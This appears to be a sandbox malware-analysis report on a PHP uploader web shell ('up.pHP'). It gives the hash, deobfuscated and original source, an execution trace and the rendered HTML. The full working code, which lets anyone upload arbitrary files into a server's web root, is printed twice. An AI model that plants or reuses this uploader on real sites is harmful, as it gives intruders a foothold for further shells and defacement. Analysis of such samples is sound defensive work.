PHP Malware Analysis

up.pHP

md5: 60b9beff6a87b8eadde2294a37fbd814

Deobfuscated PHP code

<?php

echo "<b>" . php_uname() . "</b><br>";
echo "<form method='post' enctype='multipart/form-data'>\r\n      <input type='file' name='Fole'>\r\n      <input type='submit' name='upload' value='upload'>\r\n      </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['Fole']['name'];
$dest = $root . '/' . $files;
if (isset($_POST['upload'])) {
    if (is_writable($root)) {
        if (@copy($_FILES['Fole']['tmp_name'], $dest)) {
            $web = "http://" . $_SERVER['HTTP_HOST'] . "/";
            echo "Success! ==>> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
        } else {
            echo "Failed!";
        }
    } else {
        if (@copy($_FILES['Fole']['tmp_name'], $files)) {
            echo "Success! <b>{$files}</b> at this folder";
        } else {
            echo "Failed!";
        }
    }
}

Execution traces

data/traces/60b9beff6a87b8eadde2294a37fbd814_trace-1676255860.6949.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:38:06.592723]
1	0	1	0.000148	393464
1	3	0	0.000226	398688	{main}	1		/var/www/html/uploads/up.pHP	0	0
2	4	0	0.000242	398688	php_uname	0		/var/www/html/uploads/up.pHP	2	0
2	4	1	0.000256	398800
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/up.pHP	7	$root = '/var/www/html'
1		A						/var/www/html/uploads/up.pHP	8	$files = NULL
1		A						/var/www/html/uploads/up.pHP	9	$dest = '/var/www/html/'
1	3	1	0.000332	398728
			0.000358	314336
TRACE END   [2023-02-13 00:38:06.592965]


Generated HTML code

<html><head></head><body><b>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</b><br><form method="post" enctype="multipart/form-data">
      <input type="file" name="Fole">
      <input type="submit" name="upload" value="upload">
      </form></body></html>

Original PHP code

<?php
echo "<b>".php_uname()."</b><br>";
echo "<form method='post' enctype='multipart/form-data'>
      <input type='file' name='Fole'>
      <input type='submit' name='upload' value='upload'>
      </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['Fole']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
    if(is_writable($root)) {
        if(@copy($_FILES['Fole']['tmp_name'], $dest)) {
            $web = "http://".$_SERVER['HTTP_HOST']."/";
            echo "Success! ==>> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
        } else {
            echo "Failed!";
        }
    } else {
        if(@copy($_FILES['Fole']['tmp_name'], $files)) {
            echo "Success! <b>$files</b> at this folder";
        } else {
            echo "Failed!";
        }
    }
}
?>